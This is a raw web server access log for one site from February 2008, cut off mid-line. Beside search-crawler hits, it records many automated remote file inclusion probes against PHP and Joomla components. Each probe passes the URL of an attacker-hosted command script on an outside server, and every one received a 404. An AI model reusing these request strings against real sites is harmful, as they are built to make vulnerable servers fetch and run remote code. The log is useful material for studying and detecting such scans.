74.6.17.141 - - [14/Feb/2008:14:18:13 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.233.130.105 - - [14/Feb/2008:14:19:43 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.37 - - [14/Feb/2008:14:20:52 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.80.206.12 - - [14/Feb/2008:14:20:59 -0800] "GET /logs/access.log/administrator/index3.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.206.12 - - [14/Feb/2008:14:20:59 -0800] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.206.12 - - [14/Feb/2008:14:21:03 -0800] "GET /logs/access.log/administrator/index3.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.206.12 - - [14/Feb/2008:14:21:04 -0800] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.45 - - [14/Feb/2008:14:21:08 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.128.144 - - [14/Feb/2008:14:22:08 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:14:22:48 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:14:22:48 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:22:59 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:22:59 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:22:59 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.182 - - [14/Feb/2008:14:23:05 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:24:37 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:24:37 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:24:38 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:14:24:57 -0800] "GET /logs/access_080105.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:14:24:57 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:14:25:59 -0800] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:14:25:59 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:14:25:59 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:14:25:59 -0800] "GET /errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:14:25:59 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:14:25:59 -0800] "GET /logs/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:14:27:05 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:14:27:05 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:14:27:05 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.93.255.93 - - [14/Feb/2008:14:28:01 -0800] "GET /logs/access_080131.log/vbgsitemap/vbgsitemap-config.php?base=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [14/Feb/2008:14:28:02 -0800] "GET /vbgsitemap/vbgsitemap-config.php?base=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [14/Feb/2008:14:28:02 -0800] "GET /logs/vbgsitemap/vbgsitemap-config.php?base=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:14:28:38 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:14:28:38 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:14:28:39 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.214.232 - - [14/Feb/2008:14:29:31 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.93.255.93 - - [14/Feb/2008:14:30:20 -0800] "GET /logs/access_080201.log/vbgsitemap/vbgsitemap-config.php?base=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:14:30:20 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:14:30:21 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:14:30:21 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.41.19 - - [14/Feb/2008:14:30:23 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.28.10 - - [14/Feb/2008:14:30:31 -0800] "GET /serverstats.php?gl_root_path=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
62.43.197.73 - - [14/Feb/2008:14:30:44 -0800] "GET /logs/access_080117.log/index.php?option=com_forun&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.43.197.73 - - [14/Feb/2008:14:30:49 -0800] "GET /index.php?option=com_forun&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.43.197.73 - - [14/Feb/2008:14:30:50 -0800] "GET /logs/index.php?option=com_forun&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.45 - - [14/Feb/2008:14:31:37 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [14/Feb/2008:14:31:38 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:31:39 -0800] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:31:39 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:31:39 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.167 - - [14/Feb/2008:14:32:56 -0800] "GET /logs/access_070726.log HTTP/1.0" 200 41609 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.209.50 - - [14/Feb/2008:14:34:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:14:34:30 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:14:34:30 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:14:34:30 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:14:37:28 -0800] "GET /logs/access_080122.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.76.103.42 - - [14/Feb/2008:14:37:28 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.auction.e-waseet.com/counter/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:37:32 -0800] "GET /logs/access.log/book.php5?page=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:37:33 -0800] "GET /book.php5?page=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:37:33 -0800] "GET /logs/book.php5?page=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.241.241 - - [14/Feb/2008:14:38:41 -0800] "GET /logs/access_071214.log//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.241.241 - - [14/Feb/2008:14:38:41 -0800] "GET //skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.241.241 - - [14/Feb/2008:14:38:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:14:38:59 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:14:39:00 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.66.182 - - [14/Feb/2008:14:39:37 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [14/Feb/2008:14:39:37 -0800] "GET /logs/access_080105.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.130.105 - - [14/Feb/2008:14:39:45 -0800] "GET /logs/access.log/administrator/index3.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.105 - - [14/Feb/2008:14:39:45 -0800] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.71 - - [14/Feb/2008:14:40:08 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:40:22 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.28.112.251 - - [14/Feb/2008:14:41:43 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.thebeadroom.com/calendar/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.251 - - [14/Feb/2008:14:41:43 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.thebeadroom.com/calendar/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.251 - - [14/Feb/2008:14:41:43 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.thebeadroom.com/calendar/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.202.241.37 - - [14/Feb/2008:14:42:01 -0800] "GET //blocks/block_site_map.php?root_folder_path=http://shirereaves.com/WebCalendar/includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.202.241.37 - - [14/Feb/2008:14:42:01 -0800] "GET /logs//blocks/block_site_map.php?root_folder_path=http://shirereaves.com/WebCalendar/includes/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:14:42:36 -0800] "GET /main.php?pagina=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.141 - - [14/Feb/2008:14:43:35 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:43:51 -0800] "GET /logs/access.log/book.php5?page=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:43:51 -0800] "GET /book.php5?page=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:43:51 -0800] "GET /logs/book.php5?page=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:43:58 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:44:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:44:09 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:44:09 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:44:09 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:14:44:49 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.103.42 - - [14/Feb/2008:14:44:49 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.auction.e-waseet.com/counter/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.103.42 - - [14/Feb/2008:14:44:50 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.auction.e-waseet.com/counter/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:44:58 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:44:58 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:45:02 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:45:02 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:45:10 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:45:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:45:11 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:14:45:25 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:14:46:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:14:46:41 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:47:08 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:47:09 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:47:09 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:14:47:11 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:14:47:19 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:47:37 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:47:37 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:14:47:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [14/Feb/2008:14:47:41 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [14/Feb/2008:14:47:41 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 2